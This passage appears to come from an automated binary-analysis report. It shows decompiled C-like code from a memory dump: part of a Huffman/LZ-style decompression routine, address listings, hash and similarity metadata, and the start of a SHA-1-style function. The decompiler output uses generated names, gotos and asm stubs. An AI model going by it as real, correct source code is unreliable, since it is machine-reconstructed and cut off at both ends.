                                                                            													__eflags = _t498 - 8;
                                                                            													if(_t498 < 8) {
                                                                            														goto L85;
                                                                            													}
                                                                            													_t633 = _t498 >> 3;
                                                                            													__eflags = _t633;
                                                                            													do {
                                                                            														_t498 = _t498 - 8;
                                                                            														 *_t529 =  *_t675;
                                                                            														 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
                                                                            														 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
                                                                            														 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
                                                                            														 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
                                                                            														 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
                                                                            														 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
                                                                            														_t416 =  *((intOrPtr*)(_t675 + 7));
                                                                            														_t675 = _t675 + 8;
                                                                            														 *((char*)(_t529 + 7)) = _t416;
                                                                            														_t529 = _t529 + 8;
                                                                            														_t633 = _t633 - 1;
                                                                            														__eflags = _t633;
                                                                            													} while (_t633 != 0);
                                                                            													goto L85;
                                                                            												}
                                                                            												_push(_t691 + 0x28);
                                                                            												_t417 = E001A3564(_t663, _t347);
                                                                            												__eflags = _t417;
                                                                            												if(_t417 == 0) {
                                                                            													goto L100;
                                                                            												}
                                                                            												_t420 = E001A1A0E(_t663, _t691 + 0x28);
                                                                            												__eflags = _t420;
                                                                            												if(_t420 != 0) {
                                                                            													goto L33;
                                                                            												}
                                                                            												goto L100;
                                                                            											}
                                                                            											_t501 = _t619 - 0x106;
                                                                            											__eflags = _t501 - 8;
                                                                            											if(_t501 >= 8) {
                                                                            												_t680 = (_t501 >> 2) - 1;
                                                                            												_t501 = (_t501 & 0x00000003 | 0x00000004) << _t680;
                                                                            												__eflags = _t501;
                                                                            											} else {
                                                                            												_t680 = 0;
                                                                            											}
                                                                            											_t498 = _t501 + 2;
                                                                            											__eflags = _t680;
                                                                            											if(_t680 == 0) {
                                                                            												_t681 = _t654 + 4;
                                                                            											} else {
                                                                            												_t472 = E0019A4ED(_t347);
                                                                            												_t600 = 0x10;
                                                                            												_t498 = _t498 + (_t472 >> _t600 - _t680);
                                                                            												_t603 =  *(_t654 + 8) + _t680;
                                                                            												_t681 = _t654 + 4;
                                                                            												 *_t681 =  *_t681 + (_t603 >> 3);
                                                                            												 *(_t681 + 4) = _t603 & 0x00000007;
                                                                            											}
                                                                            											_t421 = E0019A4ED(_t681);
                                                                            											_t422 =  *(_t654 + 0xfa0);
                                                                            											_t635 = _t421 & 0x0000fffe;
                                                                            											__eflags = _t635 -  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4));
                                                                            											if(_t635 >=  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4))) {
                                                                            												_t682 = 0xf;
                                                                            												_t423 = _t422 + 1;
                                                                            												__eflags = _t423 - _t682;
                                                                            												if(_t423 >= _t682) {
                                                                            													L49:
                                                                            													_t552 =  *(_t654 + 8) + _t682;
                                                                            													 *(_t654 + 8) = _t552 & 0x00000007;
                                                                            													_t425 = _t552 >> 3;
                                                                            													 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + _t425;
                                                                            													_t554 = 0x10;
                                                                            													_t557 =  *((intOrPtr*)(_t654 + 0xf60 + _t682 * 4)) + (_t635 -  *((intOrPtr*)(_t654 + 0xf1c + _t682 * 4)) >> _t554 - _t682);
                                                                            													__eflags = _t557 -  *((intOrPtr*)(_t654 + 0xf1c));
                                                                            													asm("sbb eax, eax");
                                                                            													_t426 = _t425 & _t557;
                                                                            													__eflags = _t426;
                                                                            													_t427 =  *(_t654 + 0x1ba4 + _t426 * 2) & 0x0000ffff;
                                                                            													goto L50;
                                                                            												}
                                                                            												_t593 = _t654 + (_t423 + 0x3c8) * 4;
                                                                            												while(1) {
                                                                            													__eflags = _t635 -  *_t593;
                                                                            													if(_t635 <  *_t593) {
                                                                            														break;
                                                                            													}
                                                                            													_t423 = _t423 + 1;
                                                                            													_t593 = _t593 + 4;
                                                                            													__eflags = _t423 - 0xf;
                                                                            													if(_t423 < 0xf) {
                                                                            														continue;
                                                                            													}
                                                                            													goto L49;
                                                                            												}
                                                                            												_t682 = _t423;
                                                                            												goto L49;
                                                                            											} else {
                                                                            												_t594 = 0x10;
                                                                            												_t652 = _t635 >> _t594 - _t422;
                                                                            												_t597 = ( *(_t652 + _t654 + 0xfa4) & 0x000000ff) +  *(_t681 + 4);
                                                                            												 *_t681 =  *_t681 + (_t597 >> 3);
                                                                            												 *(_t681 + 4) = _t597 & 0x00000007;
                                                                            												_t427 =  *(_t654 + 0x13a4 + _t652 * 2) & 0x0000ffff;
                                                                            												L50:
                                                                            												_t638 = _t427 & 0x0000ffff;
                                                                            												__eflags = _t638 - 4;
                                                                            												if(_t638 >= 4) {
                                                                            													_t430 = (_t638 >> 1) - 1;
                                                                            													_t638 = (_t638 & 0x00000001 | 0x00000002) << _t430;
                                                                            													__eflags = _t638;
                                                                            												} else {
                                                                            													_t430 = 0;
                                                                            												}
                                                                            												 *(_t691 + 0x18) = _t430;
                                                                            												_t559 = _t638 + 1;
                                                                            												 *(_t691 + 0x24) = _t559;
                                                                            												_t683 = _t559;
                                                                            												 *(_t691 + 0x1c) = _t683;
                                                                            												__eflags = _t430;
                                                                            												if(_t430 == 0) {
                                                                            													L70:
                                                                            													__eflags = _t683 - 0x100;
                                                                            													if(_t683 > 0x100) {
                                                                            														_t498 = _t498 + 1;
                                                                            														__eflags = _t683 - 0x2000;
                                                                            														if(_t683 > 0x2000) {
                                                                            															_t498 = _t498 + 1;
                                                                            															__eflags = _t683 - 0x40000;
                                                                            															if(_t683 > 0x40000) {
                                                                            																_t498 = _t498 + 1;
                                                                            																__eflags = _t498;
                                                                            															}
                                                                            														}
                                                                            													}
                                                                            													 *(_t663 + 0x6c) =  *(_t663 + 0x68);
                                                                            													 *(_t663 + 0x68) =  *(_t663 + 0x64);
                                                                            													 *(_t663 + 0x64) =  *(_t663 + 0x60);
                                                                            													 *(_t663 + 0x60) = _t683;
                                                                            													_t641 =  *(_t663 + 0x7c);
                                                                            													_t561 = _t641 - _t683;
                                                                            													_t435 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
                                                                            													 *(_t663 + 0x74) = _t498;
                                                                            													 *(_t691 + 0x24) = _t561;
                                                                            													__eflags = _t561 - _t435;
                                                                            													if(_t561 >= _t435) {
                                                                            														L93:
                                                                            														_t666 =  *((intOrPtr*)(_t691 + 0x14));
                                                                            														_t347 = _t654 + 4;
                                                                            														__eflags = _t498;
                                                                            														if(_t498 == 0) {
                                                                            															goto L23;
                                                                            														}
                                                                            														_t684 =  *(_t663 + 0xe6dc);
                                                                            														_t661 =  *(_t691 + 0x24);
                                                                            														do {
                                                                            															_t685 = _t684 & _t661;
                                                                            															_t661 = _t661 + 1;
                                                                            															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)( *((intOrPtr*)(_t663 + 0x4b40)) + _t685));
                                                                            															_t684 =  *(_t663 + 0xe6dc);
                                                                            															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t684;
                                                                            															_t498 = _t498 - 1;
                                                                            															__eflags = _t498;
                                                                            														} while (_t498 != 0);
                                                                            														goto L150;
                                                                            													} else {
                                                                            														__eflags = _t641 - _t435;
                                                                            														if(_t641 >= _t435) {
                                                                            															goto L93;
                                                                            														}
                                                                            														_t440 =  *((intOrPtr*)(_t663 + 0x4b40));
                                                                            														_t675 = _t440 + _t561;
                                                                            														_t529 = _t440 + _t641;
                                                                            														 *(_t691 + 0x24) = _t529;
                                                                            														 *(_t663 + 0x7c) = _t641 + _t498;
                                                                            														__eflags =  *(_t691 + 0x1c) - _t498;
                                                                            														if( *(_t691 + 0x1c) >= _t498) {
                                                                            															__eflags = _t498 - 8;
                                                                            															if(_t498 < 8) {
                                                                            																goto L85;
                                                                            															}
                                                                            															_t443 = _t498 >> 3;
                                                                            															__eflags = _t443;
                                                                            															 *(_t691 + 0x1c) = _t443;
                                                                            															_t662 = _t443;
                                                                            															do {
                                                                            																E001AEA80(_t529, _t675, 8);
                                                                            																_t563 =  *((intOrPtr*)(_t691 + 0x30));
                                                                            																_t691 = _t691 + 0xc;
                                                                            																_t529 = _t563 + 8;
                                                                            																_t675 = _t675 + 8;
                                                                            																_t498 = _t498 - 8;
                                                                            																 *(_t691 + 0x24) = _t529;
                                                                            																_t662 = _t662 - 1;
                                                                            																__eflags = _t662;
                                                                            															} while (_t662 != 0);
                                                                            															goto L84;
                                                                            														}
                                                                            														__eflags = _t498 - 8;
                                                                            														if(_t498 < 8) {
                                                                            															goto L85;
                                                                            														}
                                                                            														_t644 = _t498 >> 3;
                                                                            														__eflags = _t644;
                                                                            														do {
                                                                            															_t498 = _t498 - 8;
                                                                            															 *_t529 =  *_t675;
                                                                            															 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
                                                                            															 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
                                                                            															 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
                                                                            															 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
                                                                            															 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
                                                                            															 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
                                                                            															_t452 =  *((intOrPtr*)(_t675 + 7));
                                                                            															_t675 = _t675 + 8;
                                                                            															 *((char*)(_t529 + 7)) = _t452;
                                                                            															_t529 = _t529 + 8;
                                                                            															_t644 = _t644 - 1;
                                                                            															__eflags = _t644;
                                                                            														} while (_t644 != 0);
                                                                            														goto L85;
                                                                            													}
                                                                            												} else {
                                                                            													__eflags = _t430 - 4;
                                                                            													if(__eflags < 0) {
                                                                            														_t453 = E001A7D76(_t654 + 4);
                                                                            														_t565 = 0x20;
                                                                            														_t568 =  *(_t654 + 8) +  *(_t691 + 0x18);
                                                                            														_t683 = (_t453 >> _t565 -  *(_t691 + 0x18)) +  *(_t691 + 0x24);
                                                                            														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t568 >> 3);
                                                                            														_t569 = _t568 & 0x00000007;
                                                                            														__eflags = _t569;
                                                                            														 *(_t654 + 8) = _t569;
                                                                            														L69:
                                                                            														 *(_t691 + 0x1c) = _t683;
                                                                            														goto L70;
                                                                            													}
                                                                            													if(__eflags <= 0) {
                                                                            														_t645 = _t654 + 4;
                                                                            													} else {
                                                                            														_t467 = E001A7D76(_t654 + 4);
                                                                            														_t651 =  *(_t691 + 0x18);
                                                                            														_t587 = 0x24;
                                                                            														_t590 = _t651 - 4 +  *(_t654 + 8);
                                                                            														_t645 = _t654 + 4;
                                                                            														_t683 = (_t467 >> _t587 - _t651 << 4) +  *(_t691 + 0x24);
                                                                            														 *_t645 =  *_t645 + (_t590 >> 3);
                                                                            														 *(_t645 + 4) = _t590 & 0x00000007;
                                                                            													}
                                                                            													_t456 = E0019A4ED(_t645);
                                                                            													_t457 =  *(_t654 + 0x1e8c);
                                                                            													_t647 = _t456 & 0x0000fffe;
                                                                            													__eflags = _t647 -  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4));
                                                                            													if(_t647 >=  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4))) {
                                                                            														_t571 = 0xf;
                                                                            														_t458 = _t457 + 1;
                                                                            														 *(_t691 + 0x18) = _t571;
                                                                            														__eflags = _t458 - _t571;
                                                                            														if(_t458 >= _t571) {
                                                                            															L66:
                                                                            															_t573 =  *(_t654 + 8) +  *(_t691 + 0x18);
                                                                            															 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t573 >> 3);
                                                                            															_t461 =  *(_t691 + 0x18);
                                                                            															 *(_t654 + 8) = _t573 & 0x00000007;
                                                                            															_t575 = 0x10;
                                                                            															_t578 =  *((intOrPtr*)(_t654 + 0x1e4c + _t461 * 4)) + (_t647 -  *((intOrPtr*)(_t654 + 0x1e08 + _t461 * 4)) >> _t575 - _t461);
                                                                            															__eflags = _t578 -  *((intOrPtr*)(_t654 + 0x1e08));
                                                                            															asm("sbb eax, eax");
                                                                            															_t462 = _t461 & _t578;
                                                                            															__eflags = _t462;
                                                                            															_t463 =  *(_t654 + 0x2a90 + _t462 * 2) & 0x0000ffff;
                                                                            															goto L67;
                                                                            														}
                                                                            														_t580 = _t654 + (_t458 + 0x783) * 4;
                                                                            														while(1) {
                                                                            															__eflags = _t647 -  *_t580;
                                                                            															if(_t647 <  *_t580) {
                                                                            																break;
                                                                            															}
                                                                            															_t458 = _t458 + 1;
                                                                            															_t580 = _t580 + 4;
                                                                            															__eflags = _t458 - 0xf;
                                                                            															if(_t458 < 0xf) {
                                                                            																continue;
                                                                            															}
                                                                            															goto L66;
                                                                            														}
                                                                            														 *(_t691 + 0x18) = _t458;
                                                                            														goto L66;
                                                                            													} else {
                                                                            														_t581 = 0x10;
                                                                            														_t650 = _t647 >> _t581 - _t457;
                                                                            														_t584 = ( *(_t650 + _t654 + 0x1e90) & 0x000000ff) +  *(_t654 + 8);
                                                                            														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t584 >> 3);
                                                                            														 *(_t654 + 8) = _t584 & 0x00000007;
                                                                            														_t463 =  *(_t654 + 0x2290 + _t650 * 2) & 0x0000ffff;
                                                                            														L67:
                                                                            														_t683 = _t683 + (_t463 & 0x0000ffff);
                                                                            														goto L69;
                                                                            													}
                                                                            												}
                                                                            											}
                                                                            										}
                                                                            										 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) = _t619;
                                                                            										_t69 = _t663 + 0x7c;
                                                                            										 *_t69 =  *(_t663 + 0x7c) + 1;
                                                                            										__eflags =  *_t69;
                                                                            										goto L33;
                                                                            									}
                                                                            									_t607 = _t654 + (_t353 + 0xd) * 4;
                                                                            									while(1) {
                                                                            										__eflags = _t616 -  *_t607;
                                                                            										if(_t616 <  *_t607) {
                                                                            											break;
                                                                            										}
                                                                            										_t353 = _t353 + 1;
                                                                            										_t607 = _t607 + 4;
                                                                            										__eflags = _t353 - 0xf;
                                                                            										if(_t353 < 0xf) {
                                                                            											continue;
                                                                            										}
                                                                            										goto L30;
                                                                            									}
                                                                            									_t490 = _t353;
                                                                            									goto L30;
                                                                            								}
                                                                            								_t608 = 0x10;
                                                                            								_t653 = _t616 >> _t608 - _t352;
                                                                            								_t611 = ( *(_t653 + _t654 + 0xb8) & 0x000000ff) +  *(_t667 + 4);
                                                                            								 *_t667 =  *_t667 + (_t611 >> 3);
                                                                            								_t347 = _t654 + 4;
                                                                            								 *(_t347 + 4) = _t611 & 0x00000007;
                                                                            								_t619 =  *(_t654 + 0x4b8 + _t653 * 2) & 0x0000ffff;
                                                                            								goto L31;
                                                                            							}
                                                                            							__eflags = _t507 -  *(_t663 + 0x7c);
                                                                            							if(_t507 ==  *(_t663 + 0x7c)) {
                                                                            								goto L21;
                                                                            							}
                                                                            							E001A47DA(_t663);
                                                                            							__eflags =  *((intOrPtr*)(_t663 + 0x4c5c)) -  *((intOrPtr*)(_t663 + 0x4c4c));
                                                                            							if(__eflags > 0) {
                                                                            								L152:
                                                                            								_t418 = 0;
                                                                            								goto L101;
                                                                            							}
                                                                            							if(__eflags < 0) {
                                                                            								goto L21;
                                                                            							}
                                                                            							__eflags =  *((intOrPtr*)(_t663 + 0x4c58)) -  *((intOrPtr*)(_t663 + 0x4c48));
                                                                            							if( *((intOrPtr*)(_t663 + 0x4c58)) >  *((intOrPtr*)(_t663 + 0x4c48))) {
                                                                            								goto L152;
                                                                            							}
                                                                            							goto L21;
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				 *((char*)(_t654 + 0x2c)) = 1;
                                                                            				_push(_t654 + 0x30);
                                                                            				_push(_t654 + 0x18);
                                                                            				_push(_t654 + 4);
                                                                            				if(E001A397F(__ecx) != 0) {
                                                                            					goto L3;
                                                                            				}
                                                                            				goto L2;
                                                                            			}
                                                                            0x001a75ba
                                                                            0x001a75ba
                                                                            0x00000000
                                                                            0x001a75bf
                                                                            0x001a754b
                                                                            0x001a749b
                                                                            0x001a749e
                                                                            0x001a749e
                                                                            0x001a74a0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a74a2
                                                                            0x001a74a3
                                                                            0x001a74a6
                                                                            0x001a74a9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a74ab
                                                                            0x001a74ad
                                                                            0x00000000
                                                                            0x001a74ad
                                                                            0x001a7465
                                                                            0x001a7468
                                                                            0x001a7472
                                                                            0x001a747a
                                                                            0x001a7480
                                                                            0x001a7483
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a7432
                                                                            0x001a7432
                                                                            0x001a7435
                                                                            0x001a7437
                                                                            0x001a743a
                                                                            0x001a743a
                                                                            0x001a743a
                                                                            0x00000000
                                                                            0x001a7432
                                                                            0x001a7308
                                                                            0x001a730b
                                                                            0x001a730f
                                                                            0x001a7311
                                                                            0x001a6e27
                                                                            0x001a6e27
                                                                            0x00000000
                                                                            0x001a6e27
                                                                            0x001a7317
                                                                            0x001a731a
                                                                            0x001a731f
                                                                            0x001a7321
                                                                            0x001a732b
                                                                            0x001a7330
                                                                            0x001a7332
                                                                            0x001a73e2
                                                                            0x001a73e2
                                                                            0x001a73e5
                                                                            0x001a73e7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a73ed
                                                                            0x001a73f3
                                                                            0x001a73f9
                                                                            0x001a73fe
                                                                            0x001a7402
                                                                            0x001a7408
                                                                            0x001a7411
                                                                            0x001a7414
                                                                            0x001a7414
                                                                            0x001a7414
                                                                            0x00000000
                                                                            0x001a7419
                                                                            0x001a7338
                                                                            0x001a733a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a7340
                                                                            0x001a7346
                                                                            0x001a7348
                                                                            0x001a734e
                                                                            0x001a7352
                                                                            0x001a7355
                                                                            0x001a7359
                                                                            0x001a73ab
                                                                            0x001a73ae
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a73b6
                                                                            0x001a73b6
                                                                            0x001a73b9
                                                                            0x001a73bb
                                                                            0x001a73bf
                                                                            0x001a73c4
                                                                            0x001a73c8
                                                                            0x001a73cb
                                                                            0x001a73ce
                                                                            0x001a73d1
                                                                            0x001a73d4
                                                                            0x001a73d8
                                                                            0x001a73d8
                                                                            0x001a73d8
                                                                            0x00000000
                                                                            0x001a73dd
                                                                            0x001a735b
                                                                            0x001a735e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a7366
                                                                            0x001a7366
                                                                            0x001a7369
                                                                            0x001a736c
                                                                            0x001a736f
                                                                            0x001a7374
                                                                            0x001a737a
                                                                            0x001a7380
                                                                            0x001a7386
                                                                            0x001a738c
                                                                            0x001a7392
                                                                            0x001a7395
                                                                            0x001a7398
                                                                            0x001a739b
                                                                            0x001a739e
                                                                            0x001a73a1
                                                                            0x001a73a1
                                                                            0x001a73a1
                                                                            0x00000000
                                                                            0x001a73a6
                                                                            0x001a72cf
                                                                            0x001a72d3
                                                                            0x001a72d8
                                                                            0x001a72da
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a72e3
                                                                            0x001a72e8
                                                                            0x001a72ea
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a72ea
                                                                            0x001a6eb1
                                                                            0x001a6eb7
                                                                            0x001a6eba
                                                                            0x001a6ecb
                                                                            0x001a6ece
                                                                            0x001a6ece
                                                                            0x001a6ebc
                                                                            0x001a6ebc
                                                                            0x001a6ebc
                                                                            0x001a6ed0
                                                                            0x001a6ed3
                                                                            0x001a6ed5
                                                                            0x001a6eff
                                                                            0x001a6ed7
                                                                            0x001a6ed9
                                                                            0x001a6ee0
                                                                            0x001a6ee8
                                                                            0x001a6eea
                                                                            0x001a6eec
                                                                            0x001a6ef4
                                                                            0x001a6efa
                                                                            0x001a6efa
                                                                            0x001a6f04
                                                                            0x001a6f0b
                                                                            0x001a6f11
                                                                            0x001a6f17
                                                                            0x001a6f1e
                                                                            0x001a6f4c
                                                                            0x001a6f4d
                                                                            0x001a6f4e
                                                                            0x001a6f50
                                                                            0x001a6f6c
                                                                            0x001a6f6f
                                                                            0x001a6f76
                                                                            0x001a6f79
                                                                            0x001a6f7c
                                                                            0x001a6f88
                                                                            0x001a6f94
                                                                            0x001a6f96
                                                                            0x001a6f9c
                                                                            0x001a6f9e
                                                                            0x001a6f9e
                                                                            0x001a6fa0
                                                                            0x00000000
                                                                            0x001a6fa0
                                                                            0x001a6f58
                                                                            0x001a6f5b
                                                                            0x001a6f5b
                                                                            0x001a6f5d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a6f5f
                                                                            0x001a6f60
                                                                            0x001a6f63
                                                                            0x001a6f66
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a6f68
                                                                            0x001a6f6a
                                                                            0x00000000
                                                                            0x001a6f20
                                                                            0x001a6f22
                                                                            0x001a6f25
                                                                            0x001a6f2f
                                                                            0x001a6f37
                                                                            0x001a6f3d
                                                                            0x001a6f40
                                                                            0x001a6fa8
                                                                            0x001a6fa8
                                                                            0x001a6fab
                                                                            0x001a6fae
                                                                            0x001a6fbe
                                                                            0x001a6fc1
                                                                            0x001a6fc1
                                                                            0x001a6fb0
                                                                            0x001a6fb0
                                                                            0x001a6fb0
                                                                            0x001a6fc3
                                                                            0x001a6fc7
                                                                            0x001a6fca
                                                                            0x001a6fce
                                                                            0x001a6fd0
                                                                            0x001a6fd4
                                                                            0x001a6fd6
                                                                            0x001a7107
                                                                            0x001a7107
                                                                            0x001a710d
                                                                            0x001a710f
                                                                            0x001a7110
                                                                            0x001a7116
                                                                            0x001a7118
                                                                            0x001a7119
                                                                            0x001a711f
                                                                            0x001a7121
                                                                            0x001a7121
                                                                            0x001a7121
                                                                            0x001a711f
                                                                            0x001a7116
                                                                            0x001a7125
                                                                            0x001a712b
                                                                            0x001a7131
                                                                            0x001a7134
                                                                            0x001a7137
                                                                            0x001a7142
                                                                            0x001a7144
                                                                            0x001a7149
                                                                            0x001a714c
                                                                            0x001a7150
                                                                            0x001a7152
                                                                            0x001a7283
                                                                            0x001a7283
                                                                            0x001a7287
                                                                            0x001a728a
                                                                            0x001a728c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a7292
                                                                            0x001a7298
                                                                            0x001a729c
                                                                            0x001a72a2
                                                                            0x001a72a7
                                                                            0x001a72ab
                                                                            0x001a72b1
                                                                            0x001a72ba
                                                                            0x001a72bd
                                                                            0x001a72bd
                                                                            0x001a72bd
                                                                            0x00000000
                                                                            0x001a7158
                                                                            0x001a7158
                                                                            0x001a715a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a7160
                                                                            0x001a7166
                                                                            0x001a7169
                                                                            0x001a716f
                                                                            0x001a7173
                                                                            0x001a7176
                                                                            0x001a717a
                                                                            0x001a71c5
                                                                            0x001a71c8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a71cc
                                                                            0x001a71cc
                                                                            0x001a71cf
                                                                            0x001a71d3
                                                                            0x001a71d5
                                                                            0x001a71d9
                                                                            0x001a71de
                                                                            0x001a71e2
                                                                            0x001a71e5
                                                                            0x001a71e8
                                                                            0x001a71eb
                                                                            0x001a71ee
                                                                            0x001a71f2
                                                                            0x001a71f2
                                                                            0x001a71f2
                                                                            0x00000000
                                                                            0x001a71d5
                                                                            0x001a717c
                                                                            0x001a717f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a7183
                                                                            0x001a7183
                                                                            0x001a7186
                                                                            0x001a7189
                                                                            0x001a718c
                                                                            0x001a7191
                                                                            0x001a7197
                                                                            0x001a719d
                                                                            0x001a71a3
                                                                            0x001a71a9
                                                                            0x001a71af
                                                                            0x001a71b2
                                                                            0x001a71b5
                                                                            0x001a71b8

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
                                                                            • Instruction ID: 0cbb69aeb1649223fe2dfd9df6a3debd61e386085c0a6c641cb8d9825fe22799
                                                                            • Opcode Fuzzy Hash: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
                                                                            • Instruction Fuzzy Hash: 956207796087869FC719CF28C8905B9FBE1FF56304F18866ED9968B782D330EA55CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 70%
                                                                            			E0019E973(signed int* _a4, signed int _a8, signed int _a12, signed int _a16) {
                                                                            				signed int _v4;
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				signed int _v16;
                                                                            				signed int* _v20;
                                                                            				signed int _v24;
                                                                            				signed int _v28;
                                                                            				signed int _t429;
                                                                            				intOrPtr _t431;
                                                                            				intOrPtr _t436;
                                                                            				void* _t441;
                                                                            				intOrPtr _t443;
                                                                            				signed int _t446;
                                                                            				void* _t448;
                                                                            				signed int _t454;
                                                                            				signed int _t460;
                                                                            				signed int _t466;
                                                                            				signed int _t474;
                                                                            				signed int _t482;
                                                                            				signed int _t489;
                                                                            				signed int _t512;
                                                                            				signed int _t519;
                                                                            				signed int _t526;
                                                                            				signed int _t546;
                                                                            				signed int _t555;
                                                                            				signed int _t564;
                                                                            				signed int* _t592;
                                                                            				signed int _t593;
                                                                            				signed int _t595;
                                                                            				signed int _t596;
                                                                            				signed int* _t597;
                                                                            				signed int _t598;
                                                                            				signed int _t599;
                                                                            				signed int _t601;
                                                                            				signed int _t603;
                                                                            				signed int _t604;
                                                                            				signed int* _t605;
                                                                            				signed int _t606;
                                                                            				signed int* _t670;
                                                                            				signed int* _t741;
                                                                            				signed int _t752;
                                                                            				signed int _t769;
                                                                            				signed int _t773;
                                                                            				signed int _t777;
                                                                            				signed int _t781;
                                                                            				signed int _t782;
                                                                            				signed int _t786;
                                                                            				signed int _t787;
                                                                            				signed int _t791;
                                                                            				signed int _t796;
                                                                            				signed int _t800;
                                                                            				signed int _t804;
                                                                            				signed int _t806;
                                                                            				signed int _t809;
                                                                            				signed int _t810;
                                                                            				signed int* _t811;
                                                                            				signed int _t814;
                                                                            				signed int _t815;
                                                                            				signed int _t816;
                                                                            				signed int _t820;
                                                                            				signed int _t821;
                                                                            				signed int _t825;
                                                                            				signed int _t830;
                                                                            				signed int _t834;
                                                                            				signed int _t838;
                                                                            				signed int* _t839;
                                                                            				signed int _t841;
                                                                            				signed int _t842;
                                                                            				signed int _t844;
                                                                            				signed int _t845;
                                                                            				signed int _t847;
                                                                            				signed int* _t848;
                                                                            				signed int _t851;
                                                                            				signed int* _t854;
                                                                            				signed int _t855;
                                                                            				signed int _t857;
                                                                            				signed int _t858;
                                                                            				signed int _t862;
                                                                            				signed int _t863;
                                                                            				signed int _t867;
                                                                            				signed int _t871;
                                                                            				signed int _t875;
                                                                            				signed int _t879;
                                                                            				signed int _t880;
                                                                            				signed int* _t881;
                                                                            				signed int _t882;
                                                                            				signed int _t884;
                                                                            				signed int _t885;
                                                                            				signed int _t886;
                                                                            				signed int _t887;
                                                                            				signed int _t888;
                                                                            				signed int _t890;
                                                                            				signed int _t891;
                                                                            				signed int _t893;
                                                                            				signed int _t894;
                                                                            				signed int _t896;
                                                                            				signed int _t897;
                                                                            				signed int* _t898;
                                                                            				signed int _t899;
                                                                            				signed int _t901;
                                                                            				signed int _t902;
                                                                            				signed int _t904;
                                                                            				signed int _t905;
                                                                            
                                                                            				_t906 =  &_v28;
                                                                            				if(_a16 == 0) {
                                                                            					_t839 = _a8;
                                                                            					_v20 = _t839;
                                                                            					E001AEA80(_t839, _a12, 0x40);
                                                                            					_t906 =  &(( &_v28)[3]);
                                                                            				} else {
                                                                            					_t839 = _a12;
                                                                            					_v20 = _t839;
                                                                            				}
                                                                            				_t848 = _a4;
                                                                            				_t593 =  *_t848;
                                                                            				_t886 = _t848[1];
                                                                            				_a12 = _t848[2];
                                                                            				_a16 = _t848[3];
                                                                            				_v24 = 0;
                                                                            				_t429 = E001B5604( *_t839);
                                                                            				asm("rol edx, 0x5");
                                                                            				 *_t839 = _t429;
                                                                            				_t851 = _t848[4] + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t429;
                                                                            				_t430 = _t839;
                                                                            				asm("ror ebp, 0x2");
                                                                            				_v16 = _t839;
                                                                            				_a8 =  &(_t839[3]);
                                                                            				do {
                                                                            					_t431 = E001B5604(_t430[1]);
                                                                            					asm("rol edx, 0x5");
                                                                            					 *((intOrPtr*)(_v16 + 4)) = _t431;
                                                                            					asm("ror ebx, 0x2");
